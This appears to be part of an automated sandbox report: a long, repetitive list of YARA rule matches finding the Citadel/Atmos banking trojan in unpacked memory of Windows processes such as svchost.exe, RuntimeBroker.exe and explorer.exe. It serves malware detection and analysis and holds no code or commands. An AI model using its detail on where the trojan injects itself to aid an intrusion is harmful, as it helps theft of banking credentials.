Source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.0.services.png.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 1.0.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 1.3.nyheukpo.exe.20f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
